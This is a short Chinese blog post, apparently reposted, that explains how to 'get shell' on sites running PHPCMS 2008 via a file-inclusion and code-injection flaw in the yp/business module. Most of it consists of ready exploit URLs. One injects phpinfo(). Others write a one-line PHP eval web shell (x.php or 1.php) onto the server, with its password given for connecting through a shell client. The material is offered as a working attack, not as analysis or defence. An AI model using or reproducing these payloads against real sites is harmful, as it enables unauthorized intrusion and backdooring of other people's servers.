- A+
显示不全请点击全屏阅读
关于phpcms 2008 getshell漏洞 拿shell
http://www.wooyun.org/bugs/wooyun-2010-09563
这个 注册企业会员 然后链接放exp info就出来了
EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>
不过呢 写一句话 shell 那样的话 用菜刀链接 就不行。。
这里找到一个好方法 就是。。写在目录下面。。包含一句话
madman.in/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php fwrite(fopen(‘x.php’,’a’),’<?php @eval($_POST[m])?>’);exit();?>
链接方法: madman.in/yp/business/x.php 密码 m
摘自:http://madman.in/madman5/806.htm | 疯子博客
原文中写入一句话是不会成功的,刚本人找了一个phpcms2008的站测试了
修改了下一句话代码
EXP如下http://madman.in/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?fputs(fopen(“1.php”,”w”),”<?eval($_POST[c]);?>”);exit();?>
链接方法: http://http://madman.in/yp/business/1.php密码 c
版权为疯子所有
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡